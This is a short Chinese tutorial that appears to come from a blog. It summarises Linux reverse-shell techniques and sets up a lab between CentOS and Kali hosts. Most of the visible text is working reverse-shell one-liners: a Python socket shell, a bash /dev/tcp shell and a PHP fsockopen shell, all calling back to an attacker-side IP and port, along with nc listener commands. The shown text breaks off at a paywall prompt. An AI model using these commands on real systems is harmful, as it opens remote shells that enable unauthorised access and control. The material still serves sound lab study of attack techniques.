本文总结了在Linux环境中常见的四种反弹Shell方法,包括利用nc、python、nc-e及php实现反弹Shell。详细解释了每种方法的命令原理,如文件描述符、重定向和socket连接。通过实验环境演示了如何在CentOS和kali系统间建立和利用反弹Shell,有助于深化理解Linux运维中的安全实践。
常用
python
/usr/bin/python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.226.130",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
bash
/bin/bash -i >& /dev/tcp/192.168.1.1/9999 0>&1
php
php -r '$sock=fsockopen("ip",port);exec("/bin/bash -i <&3 >&3 2>&3");'
nc接收端
nc -lvnp -{port}
实验环境
CentOS 6.5:192.168.0.3
kali2.0:192.168.0.4
方法1:
反弹shell命令如下:
/bin/bash -i >& /dev/tcp/192.168.1.1/9999 0>&1首先,使用nc在kali上监听端口:
nc -lvp 7777
订阅专栏 解锁全文
扫一扫
3647
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
